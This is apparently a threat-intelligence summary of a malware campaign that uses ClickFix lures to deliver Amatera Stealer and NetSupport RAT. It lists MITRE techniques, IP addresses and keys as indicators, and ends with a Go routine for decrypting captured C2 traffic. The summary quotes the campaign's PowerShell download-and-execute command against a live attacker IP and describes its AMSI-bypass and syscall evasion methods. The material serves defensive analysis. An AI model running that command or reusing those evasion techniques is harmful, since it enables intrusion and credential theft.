EVALUSION Campaign Delivers Amatera Stealer and NetSupport RAT

eSentire’s TRU discovered campaigns using ClickFix for initial access to deploy Amatera Stealer (a rebranded ACR/AcridRain Stealer) and NetSupport RAT. Amatera uses advanced evasion (WoW64 syscalls, AMSI bypass) and has extensive crypto-wallet and password-manager theft capabilities. eSentire published decryption helpers and detection guidance, and recommends mitigations including disabling mshta.exe, removing the Run prompt, phishing and security awareness training (PSAT), and partnering with a 24/7 MDR service. #Amatera #NetSupport

Keypoints

  • Amatera Stealer is a rebranded iteration of ACR (AcridRain) Stealer sold after source-code transfer and provides broad data exfiltration focused on crypto wallets, browsers, messaging apps, FTP and email clients.
  • Initial access commonly uses a social-engineering ClickFix vector that coerces victims to execute commands in the Windows Run prompt, delivering multi-stage PowerShell and a .NET downloader that retrieves encrypted payloads from MediaFire.
  • Amatera employs advanced evasion: WoW64 syscalls to bypass user-mode hooks, AMSI bypass by overwriting AmsiScanBuffer in clr.dll, and encrypted TLS/C2 communications with AES-256-CBC and custom XOR/base64 obfuscation for configuration and C2 addresses.
  • The loader supports fileless and file-based execution, can selectively deploy follow-on payloads (NetSupport RAT, Amadey, Vidar, Lumma) based on environment checks (domain membership or presence of valuable files), and uses markers in JPGs to hide payloads.
  • eSentire provides tooling and CyberChef recipes to extract Amatera configurations, decrypt C2 communications, and dump in-memory payloads (e.g., interrupting SetThreadContext prior to Pure Crypter stages).
  • Observed NetSupport deployments included a licensee string “KAKAN” and C2s like 45.94.47.224 and 91.98.229.246; sample C2 extraction revealed undetected hosts on VirusTotal at the time of analysis.
  • Recommended mitigations: disable mshta.exe via AppLocker/WDAC, remove the Run prompt via GPO, implement phishing/security awareness training, and engage 24/7 MDR for rapid detection and response.

MITRE Techniques

  • [T1059] Command and Scripting Interpreter – Used via PowerShell to execute multi-stage scripts and download payloads: “…powershell.exe -NoProfile -ExecutionPolicy Bypass -Command 'IEX (New-Object Net.WebClient).DownloadString(…)'”.
  • [T1190] Exploit Public-Facing Application (initial access vector via social engineering of the Run prompt) – ClickFix social engineering coerces victims into running commands in the Run prompt: “…compel them to execute malicious commands in the Windows Run Prompt…leading to the delivery of Amatera”.
  • [T1105] Ingress Tool Transfer – .NET downloader retrieves encrypted payloads from MediaFire and decrypts via RC2: “downloads an encrypted payload from MediaFire, decrypts it via RC2, and invokes the next stage”.
  • [T1547] Boot or Logon Autostart Execution (loader persistence / execution of additional payloads) – The loader can write and execute a .ps1, or drop and execute the NetSupport client (systeminfo.exe) from a decrypted zip archive, as part of the follow-on execution flow.
  • [T1027] Obfuscated Files or Information – Amatera uses XOR/base64 obfuscation and encrypted C2 strings, e.g., the C2 is stored as “an encrypted base64 string” and decrypted with the XOR key “852149723\x00”.
  • [T1569] System Services: Service Execution (abuse of legitimate RMM) – NetSupport Manager (legitimate RMM) abused for remote access after being dropped by Amatera: “Amatera subsequently dropping NetSupport Manager…deployed by threat actors for unauthorized and full remote access”.
  • [T1106] Native API – Uses WoW64 syscalls and NtDeviceIoControl to establish C2 via “\Device\Afd\Endpoint” to evade API hooking: “uses a WoW64 syscall to NtDeviceIoControl…via the Auxiliary Function Driver device ‘\Device\Afd\Endpoint’”.
  • [T1562] Impair Defenses – AMSI bypass by locating and overwriting “AmsiScanBuffer” string in clr.dll memory so GetProcAddress fails: “overwrites it with null bytes…the GetProcAddress call is passed a pointer to a null-byte filled buffer and the call fails”.
  • [T1041] Exfiltration Over C2 Channel – Stolen data bundled into zip archives and POSTed to C2, with a GUID-named text file fingerprint: “Harvested data is collected into a zip archive and sent via HTTP POST to the C2…named like .txt”.

Indicators of Compromise

  • [IP Address] C2 and payload hosts – examples: 87.120.219.26 (payload host serving PowerShell), 45.94.47.224 (NetSupport C2), and 91.98.229.246 (extracted C2 used in analysis).
  • [Domain/Hostname] Bogus Host header value used in requests – example: aether100.pronotification.table.core.windows.net (bogus Host header observed in HTTP requests).
  • [File Names / Artifacts] Deployed filenames and markers – examples: systeminfo.exe (NetSupport client executed), NSM.lic (NetSupport license file with licensee “KAKAN”).
  • [Configuration strings / Keys] Hard-coded XOR and AES keys – examples: XOR key “852149723\x00” used for C2/config decryption; AES key bytes shown in the sample stack (and included in the CyberChef recipe); AES IV patterns (sixteen 0x55 bytes for requests, the first 16 bytes of the response for responses).
  • [PowerShell Command Lines] Execution command examples – “powershell.exe -NoProfile -ExecutionPolicy Bypass -Command 'IEX (New-Object Net.WebClient).DownloadString('hxxp://87.120.219.26/P9m4H7S2FqDTof')'”.
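The AES-256-CBC traffic rules summarised above (a static IV of 0x55 bytes for requests, the IV carried in the first 16 bytes of responses) as an added Go example for analysts decrypting captured C2 traffic; it is not eSentire's tooling or the malware's code. The key, the PKCS#7 padding and the two sample messages are constructed assumptions, since the page only references the real key from a stack dump.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"fmt"
)

// cbcDecrypt is the shared AES-CBC primitive. Assumption: PKCS#7 padding, as typical CBC code uses.
func cbcDecrypt(key, iv, ct []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil || len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return nil, fmt.Errorf("bad key (%v) or ciphertext length %d", err, len(ct))
	}
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(pt, ct)
	p := int(pt[len(pt)-1]) // PKCS#7 pad length; a wrong key or truncated capture usually fails here
	if p == 0 || p > aes.BlockSize || !bytes.Equal(pt[len(pt)-p:], bytes.Repeat([]byte{byte(p)}, p)) {
		return nil, fmt.Errorf("bad PKCS#7 padding")
	}
	return pt[:len(pt)-p], nil
}
// DecryptC2 applies the reported IV rule: client->C2 requests use a static IV of sixteen 0x55 bytes; C2->client responses carry their IV in the first 16 bytes.
func DecryptC2(key, data []byte, fromServer bool) ([]byte, error) {
	iv := bytes.Repeat([]byte{0x55}, aes.BlockSize)
	if fromServer {
		if len(data) < aes.BlockSize {
			return nil, fmt.Errorf("response of %d bytes is shorter than one IV", len(data))
		}
		iv, data = data[:aes.BlockSize], data[aes.BlockSize:]
	}
	return cbcDecrypt(key, iv, data)
}
// cbcEncrypt exists only to construct sample traffic for DemoRoundTrip; it is not the malware's code.
func cbcEncrypt(key, iv, pt []byte) []byte {
	block, _ := aes.NewCipher(key)
	pad := aes.BlockSize - len(pt)%aes.BlockSize
	ct := append(append([]byte{}, pt...), bytes.Repeat([]byte{byte(pad)}, pad)...)
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, ct) // in place: dst and src overlap entirely
	return ct
}
// DemoRoundTrip builds one constructed request and one constructed response and decrypts both.
func DemoRoundTrip() (string, string) {
	key := []byte("PLACEHOLDER-KEY-32-BYTES-LONG!!!") // constructed AES-256-size key, not the real one
	iv := bytes.Repeat([]byte{0x11}, aes.BlockSize)  // constructed server-chosen IV, prepended below
	a, _ := DecryptC2(key, cbcEncrypt(key, bytes.Repeat([]byte{0x55}, aes.BlockSize), []byte(`{"hwid":"TEST"}`)), false)
	b, _ := DecryptC2(key, append(iv, cbcEncrypt(key, iv, []byte("run:netsupport"))...), true)
	return string(a), string(b)
}
```

On a real capture, substitute the key recovered from the sample and pass the raw HTTP body of each direction to DecryptC2; a padding error on a response usually means the first 16 bytes were not the IV for that message.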


Read more: https://www.esentire.com/blog/evalusion-campaign-delivers-amatera-stealer-and-netsupport-rat